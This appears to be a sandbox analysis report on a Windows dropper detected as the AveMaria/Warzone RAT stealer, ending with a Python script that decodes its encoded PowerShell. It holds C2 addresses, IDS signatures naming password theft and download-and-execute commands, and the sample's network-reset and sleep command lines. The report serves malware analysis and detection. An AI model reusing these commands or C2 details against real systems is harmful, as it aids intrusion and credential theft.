                                  SHA1:9A815D3F218A9374788F3ECF6BE3445F14B414D8
                                  SHA-256:C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
                                  SHA-512:FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
                                  Malicious:false
                                  Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15676
                                  Entropy (8bit):5.553114530083217
                                  Encrypted:false
                                  SSDEEP:384:Kte/UYhZPTRDNaSjnyulPsFvI1vs4oaYP:3h5lsoyul0CSBP
                                  MD5:7A2B1C5C62100A3062D423C48A2C2F52
                                  SHA1:18978F9AF89F2C877AE26A5529B8D3644C0ED353
                                  SHA-256:05C941DB1B395E6EA1839E3913ED1702C73AFF477556387D1E536A94A78B9FC1
                                  SHA-512:3A80C4A3539187AFBE7EE18C1BCA045B862A7BB069EB71DF2F5EF4ADD7168F12352BF5F8D8BAE987A686BE82E1BD7E2DA64293CC0F72CDEBE027FF3F31874242
                                  Malicious:false
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):1056256
                                  Entropy (8bit):7.998564189235208
                                  Encrypted:true
                                  SSDEEP:24576:fWOJrKG6vIyZCx67yqfQC40xquBsdq8Uz7REU4R9:fWOz6wyU6ML0dsdq8UJB4
                                  MD5:373574C70AB6F299813FDAFA9C12AB9B
                                  SHA1:E6DBFBBE58F87E70DA25F5CD31E526DDBCEB679E
                                  SHA-256:AD8184627690F50DA83D52FA3B92ED2597E279527821FFDEDE20240D19CC3E21
                                  SHA-512:4EC3F08AA83DB8FEDF0ACA9F0FDCB3237AFC35F34BA1ADEE6F3372D4AEC2B544DB5BB892E49F8C8A00A82C10C8BA697FF21D161D44F7695A1EAC132C190E3DD5
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 38%
                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview:[ZoneTransfer]....ZoneId=0
                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):7.998564189235208
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  File name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  File size:1056256
                                  MD5:373574c70ab6f299813fdafa9c12ab9b
                                  SHA1:e6dbfbbe58f87e70da25f5cd31e526ddbceb679e
                                  SHA256:ad8184627690f50da83d52fa3b92ed2597e279527821ffdede20240d19cc3e21
                                  SHA512:4ec3f08aa83db8fedf0aca9f0fdcb3237afc35f34ba1adee6f3372d4aec2b544db5bb892e49f8c8a00a82c10c8ba697ff21d161d44f7695a1eac132c190e3dd5
                                  SSDEEP:24576:fWOJrKG6vIyZCx67yqfQC40xquBsdq8Uz7REU4R9:fWOz6wyU6ML0dsdq8UJB4
                                  TLSH:17253359A37F8E3DC8853E309B8BD0C8A57B1ED0D9D96264F18C898F5AB60D32B11F51
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......c.............................2... ...@....@.. ....................................`................................
                                  Icon Hash:00828e8e8686b000
                                  Entrypoint:0x5032ee
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6385E5A1 [Tue Nov 29 10:57:37 2022 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al
                                   Name                                  Virtual Address  Virtual Size  Is in Section
                                   IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_IMPORT          0x1032a0         0x4b          .text
                                   IMAGE_DIRECTORY_ENTRY_RESOURCE        0x104000         0x4f8         .rsrc
                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_BASERELOC       0x106000         0xc           .reloc
                                   IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                   IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                   Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
                                   .text   0x2000           0x1012f4      0x101400  False     0.9982936254859086  data       7.999494429591008    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                   .rsrc   0x104000         0x4f8         0x600     False     0.3717447916666667  data       3.8698428692096263   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                   .reloc  0x106000         0xc           0x200     False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                   Name         RVA       Size   Type                                                                                                     Language  Country
                                   RT_VERSION   0x1040a0  0x254  data
                                   RT_MANIFEST  0x1042f4  0x204  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (513), with no line terminators
                                   DLL          Import
                                   mscoree.dll  _CorExeMain
                                   Timestamp                 Protocol  SID      Message                                                          Source Port  Dest Port  Source IP       Dest IP
                                   11/29/22-16:56:37.231932  TCP       2852347  ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse                49698        62641      192.168.2.4     62.102.148.158
                                   11/29/22-16:56:37.391216  TCP       2852350  ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand          62641        49698      62.102.148.158  192.168.2.4
                                   11/29/22-16:56:37.392528  TCP       2852355  ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule                  49698        62641      192.168.2.4     62.102.148.158
                                   11/29/22-16:56:37.392528  TCP       2852352  ETPRO TROJAN Ave Maria/Warzone RAT DownloadAndExecuteCommand     49698        62641      192.168.2.4     62.102.148.158
                                   11/29/22-16:56:40.347271  TCP       2839088  ETPRO TROJAN Ave Maria RAT Encrypted CnC KeepAlive Outbound (2)  49698        62641      192.168.2.4     62.102.148.158
                                   11/29/22-16:56:37.208383  TCP       2852346  ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket              62641        49698      62.102.148.158  192.168.2.4
                                   11/29/22-16:56:37.392528  TCP       2839089  ETPRO TROJAN Ave Maria RAT Encrypted CnC Checkin (2)             49698        62641      192.168.2.4     62.102.148.158
                                   11/29/22-16:56:40.347271  TCP       2852351  ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse         49698        62641      192.168.2.4     62.102.148.158
                                   11/29/22-16:56:38.680309  TCP       2852354  ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse      62641        49698      62.102.148.158  192.168.2.4
                                   Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
                                   Nov 29, 2022 16:55:21.169269085 CET  192.168.2.4  8.8.8.8  0x9ca1    Standard query (0)  filetransfer.io      A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:55:21.368020058 CET  192.168.2.4  8.8.8.8  0x77b4    Standard query (0)  filetransfer.io      A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:55:22.575531006 CET  192.168.2.4  8.8.8.8  0x4146    Standard query (0)  s23.filetransfer.io  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.100804090 CET  192.168.2.4  8.8.8.8  0xd143    Standard query (0)  filetransfer.io      A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.211761951 CET  192.168.2.4  8.8.8.8  0x9144    Standard query (0)  filetransfer.io      A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.671900034 CET  192.168.2.4  8.8.8.8  0xfc94    Standard query (0)  s23.filetransfer.io  A (IP address)  IN (0x0001)  false
                                   Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                 CName  Address       Type            Class        DNS over HTTPS
                                   Nov 29, 2022 16:55:21.194606066 CET  8.8.8.8    192.168.2.4  0x9ca1    No error (0)  filetransfer.io             188.114.96.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:55:21.194606066 CET  8.8.8.8    192.168.2.4  0x9ca1    No error (0)  filetransfer.io             188.114.97.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:55:21.396821976 CET  8.8.8.8    192.168.2.4  0x77b4    No error (0)  filetransfer.io             188.114.96.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:55:21.396821976 CET  8.8.8.8    192.168.2.4  0x77b4    No error (0)  filetransfer.io             188.114.97.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:55:22.599168062 CET  8.8.8.8    192.168.2.4  0x4146    No error (0)  s23.filetransfer.io         188.114.97.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:55:22.599168062 CET  8.8.8.8    192.168.2.4  0x4146    No error (0)  s23.filetransfer.io         188.114.96.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.120352983 CET  8.8.8.8    192.168.2.4  0xd143    No error (0)  filetransfer.io             188.114.96.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.120352983 CET  8.8.8.8    192.168.2.4  0xd143    No error (0)  filetransfer.io             188.114.97.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.234453917 CET  8.8.8.8    192.168.2.4  0x9144    No error (0)  filetransfer.io             188.114.97.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.234453917 CET  8.8.8.8    192.168.2.4  0x9144    No error (0)  filetransfer.io             188.114.96.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.697882891 CET  8.8.8.8    192.168.2.4  0xfc94    No error (0)  s23.filetransfer.io         188.114.96.3  A (IP address)  IN (0x0001)  false
                                   Nov 29, 2022 16:56:45.697882891 CET  8.8.8.8    192.168.2.4  0xfc94    No error (0)  s23.filetransfer.io         188.114.97.3  A (IP address)  IN (0x0001)  false
                                  • filetransfer.io
                                  • s23.filetransfer.io


                                  Target ID:0
                                  Start time:16:54:27
                                  Start date:29/11/2022
                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
                                  Imagebase:0x150000
                                  File size:1056256 bytes
                                  MD5 hash:373574C70AB6F299813FDAFA9C12AB9B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                  Reputation:low

                                  Target ID:1
                                  Start time:16:54:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"powershell" Get-Date
                                  Imagebase:0x1e0000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Target ID:2
                                  Start time:16:54:28
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:5
                                  Start time:16:55:38
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig/release
                                  Imagebase:0xd90000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:6
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:7
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                  Wow64 process (32bit):true
                                  Commandline:ipconfig /release
                                  Imagebase:0xc30000
                                  File size:29184 bytes
                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:8
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
                                  Imagebase:0x1e0000
                                  File size:430592 bytes
                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Reputation:high

                                  Target ID:9
                                  Start time:16:55:39
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:13
                                  Start time:16:56:31
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig/renew
                                  Imagebase:0xd90000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:14
                                  Start time:16:56:31
                                  Start date:29/11/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7c72c0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language

                                  Target ID:15
                                  Start time:16:56:31
                                  Start date:29/11/2022
                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                  Wow64 process (32bit):true
                                  Commandline:ipconfig /renew
                                  Imagebase:0xc30000
                                  File size:29184 bytes
                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
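
The process list above shows the chain that matters for triage: Target 8 runs powershell.exe with an -ENC blob (PowerShell's -EncodedCommand, base64 over UTF-16LE text, so a plain base64 decode yields NUL-interleaved bytes), bracketed by cmd.exe /c ipconfig/release (Target 5, 16:55:38) and cmd.exe /c ipconfig/renew (Target 13, 16:56:31). The following Python is an added example, not part of the Joe Sandbox report or of the sample; it decodes the -ENC argument and pulls the ipconfig actions out of the command lines. The command lines are copied verbatim from the report entries above; the function names and the triage() summary shape are my own.

```python
import base64
import re

# Constructed sample: (Target ID, command line) pairs copied from the report's
# process list above. Not pulled from the sandbox programmatically.
SAMPLE_PROCESSES = [
    (1, '"powershell" Get-Date'),
    (5, '"C:\\Windows\\System32\\cmd.exe" /c ipconfig/release'),
    (7, 'ipconfig /release'),
    (8, '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ENC '
        'cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA=='),
    (13, '"C:\\Windows\\System32\\cmd.exe" /c ipconfig/renew'),
    (15, 'ipconfig /renew'),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en,
# -enc, ...). Longest alternative first so "-ENC" is not cut short at "-E".
ENC_FLAG = re.compile(r'(?i)\s-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)')
# Matches both "ipconfig/release" (no space, as cmd.exe received it) and "ipconfig /release".
IPCONFIG = re.compile(r'(?i)\bipconfig(?:\.exe)?\s*/(release|renew)\b')


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if the flag is absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        # The payload is UTF-16LE, which is why a naive UTF-8 decode shows NULs between letters.
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:
        return None  # bad base64 or odd byte count: skip rather than abort the triage loop


def ipconfig_action(cmdline):
    """Return 'release' or 'renew' when the command line drives ipconfig that way, else None."""
    m = IPCONFIG.search(cmdline)
    return m.group(1).lower() if m else None


def triage(processes):
    """Summarise encoded PowerShell and ipconfig use across a (target_id, cmdline) list."""
    decoded = {}
    actions = []
    for target_id, cmdline in processes:
        script = decode_encoded_command(cmdline)
        if script is not None:
            decoded[target_id] = script
        action = ipconfig_action(cmdline)
        if action and action not in actions:
            actions.append(action)  # first-seen order: release before renew in this report
    return {
        "decoded": decoded,
        "ipconfig_actions": actions,
        # release followed later by renew: the sample drops and re-acquires its DHCP lease
        "network_bounce": actions == ["release", "renew"],
    }


if __name__ == "__main__":
    result = triage(SAMPLE_PROCESSES)
    for tid, script in result["decoded"].items():
        print(f"Target {tid}: -ENC decodes to {script!r}")
    print("ipconfig actions:", result["ipconfig_actions"])
    print("network bounce:", result["network_bounce"])
```

Run against the command lines above, the -ENC argument of Target 8 decodes to start-sleep -seconds 45, which matches the report's own timestamps: ipconfig/release starts at 16:55:38, the encoded PowerShell at 16:55:39, and ipconfig/renew at 16:56:31, so the sample pauses for most of a minute between dropping and renewing the host's DHCP lease. When hunting for this in your own telemetry, key on the parent chain (powershell.exe or the dropper spawning cmd.exe /c ipconfig/release) rather than on the base64 string, since the encoded script is trivially changed.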

                                  No disassembly